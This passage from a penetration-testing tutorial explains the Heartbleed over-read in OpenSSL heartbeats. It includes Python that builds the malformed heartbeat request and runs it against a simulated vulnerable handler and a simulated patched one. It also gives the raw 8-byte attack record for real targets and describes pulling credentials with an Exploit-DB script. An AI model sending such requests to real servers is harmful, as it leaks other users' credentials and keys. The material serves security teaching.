How it works...

Heartbleed (CVE-2014-0160) is a buffer over-read vulnerability in the heartbeat extension of OpenSSL 1.0.1 through 1.0.1f: the server reads, and sends back, more bytes from memory than it should. By exploiting it, an attacker can read the contents of the OpenSSL server process's memory in clear text, so there is no need to intercept or decrypt any communication between the client and the server. The exploitation works by abusing the heartbeat messages exchanged by client and server; these are short messages sent by the client and echoed back by the server to keep the session alive. Each heartbeat request carries a payload and a 16-bit field stating the payload's length. In a vulnerable implementation, a client can claim a payload of size X while actually sending only Y bytes (Y smaller than X, possibly zero). The server never checks the claimed length against the number of bytes that actually arrived, so it copies X bytes starting at the position where the received payload is stored; the surplus (X-Y bytes) is taken from the memory contiguous to the receive buffer. Because the length field is 16 bits wide, each request can return up to 64 KB, and the request can be repeated as often as the attacker wants. That adjacent memory usually contains data the server processed recently, such as requests from other clients that have already been decrypted, session cookies and, sometimes, private key material. The fix in OpenSSL 1.0.1g simply discards any heartbeat whose claimed length does not fit inside the record that was received.
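The following is an added example, not code from the original recipe or from the exploit it uses: it builds the malformed heartbeat record exactly as the public Heartbleed proof-of-concept scripts do (claimed length X = 0x4000, zero bytes actually sent), then runs it through a simplified model of the vulnerable OpenSSL handler and of the patched one. The heap contents (`SAMPLE_HEAP`), the hostname and the credentials in it are constructed for the demonstration; the function names are this example's own, not OpenSSL's.

```python
"""Heartbleed mechanics: build the malformed heartbeat request, then run it
through a simulated vulnerable and a simulated patched server (added example)."""
import struct

CONTENT_TYPE_HEARTBEAT = 24   # TLS record type for heartbeat (RFC 6520)
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
TLS_VERSION_1_1 = b"\x03\x02"
MIN_PADDING = 16              # RFC 6520 requires at least 16 bytes of padding

# Constructed stand-in for the heap memory next to the receive buffer: a request
# another client sent earlier, already decrypted by OpenSSL, followed by zero fill.
SAMPLE_HEAP = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n\r\n"
    b"username=alice&password=S3cret!\r\n"
).ljust(16384, b"\x00")


def build_heartbeat_request(claimed_length, payload=b"", version=TLS_VERSION_1_1):
    """Return a complete TLS record carrying a HeartbeatRequest.

    claimed_length is the 16-bit payload_length field (X); payload is what is
    really sent (Y bytes). A benign client keeps X == Y and appends padding;
    the attack sets X large and sends no payload at all.
    """
    body = struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length) + payload
    return struct.pack("!B2sH", CONTENT_TYPE_HEARTBEAT, version, len(body)) + body


def handle_heartbeat(record_body, heap, patched):
    """Model of the server's heartbeat handler over a constructed memory layout.

    record_body is the record payload as received (its length is what OpenSSL
    calls rrec.length); heap is the memory that happens to follow it.
    Returns the response body, or None when the record is discarded.
    """
    # The received bytes sit at the start of a larger allocation; whatever was
    # left there by earlier connections follows immediately after them.
    memory = bytearray(record_body) + bytearray(heap)
    hbtype = memory[0]
    (payload_length,) = struct.unpack("!H", memory[1:3])

    if patched:
        # The OpenSSL 1.0.1g check: type (1) + length (2) + payload + padding (16)
        # must fit inside the bytes that actually arrived; otherwise drop silently.
        if 1 + 2 + payload_length + MIN_PADDING > len(record_body):
            return None
    if hbtype != HEARTBEAT_REQUEST:
        return None

    # The unchecked copy: payload_length bytes starting at the payload pointer,
    # regardless of how many bytes the client really sent (X-Y bytes of over-read).
    copied = bytes(memory[3:3 + payload_length])
    padding = b"\x00" * MIN_PADDING  # real servers use random padding; zeros for simplicity
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + copied + padding


def extract_leak(response_body):
    """What the attacker reads back: the bytes echoed in the HeartbeatResponse."""
    (payload_length,) = struct.unpack("!H", response_body[1:3])
    return response_body[3:3 + payload_length]


def run_attack(claimed_length=0x4000, patched=False):
    """Claim X bytes while sending none; return the leaked bytes, or None if dropped."""
    record = build_heartbeat_request(claimed_length)
    response = handle_heartbeat(record[5:], SAMPLE_HEAP, patched)  # strip 5-byte record header
    return None if response is None else extract_leak(response)


if __name__ == "__main__":
    leak = run_attack()
    print("vulnerable server leaked %d bytes:" % len(leak))
    print(leak.rstrip(b"\x00").decode("ascii", "replace"))
    print("patched server response:", run_attack(patched=True))
```

Against a real target the same 8-byte record (`18 03 02 00 03 01 40 00`) is sent over the socket after the TLS handshake has completed, and the leak is whatever comes back after the 3-byte heartbeat header; the simulated server here only replaces the network and the process memory so the over-read can be seen offline.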

Once we identify a vulnerable target, we use the searchsploit command, which is the command-line interface to the local copy of Exploit-DB installed on Kali Linux; it looks for the given search terms in the exploit titles and paths and displays the matches together with the path to each exploit file, so we can open the script and read it before using it.

Once we understand how the exploit works and have determined that it is safe to use, we run it against the target and collect the results. In our example, we were able to extract a valid username and password from a request that another client had sent over the encrypted channel.
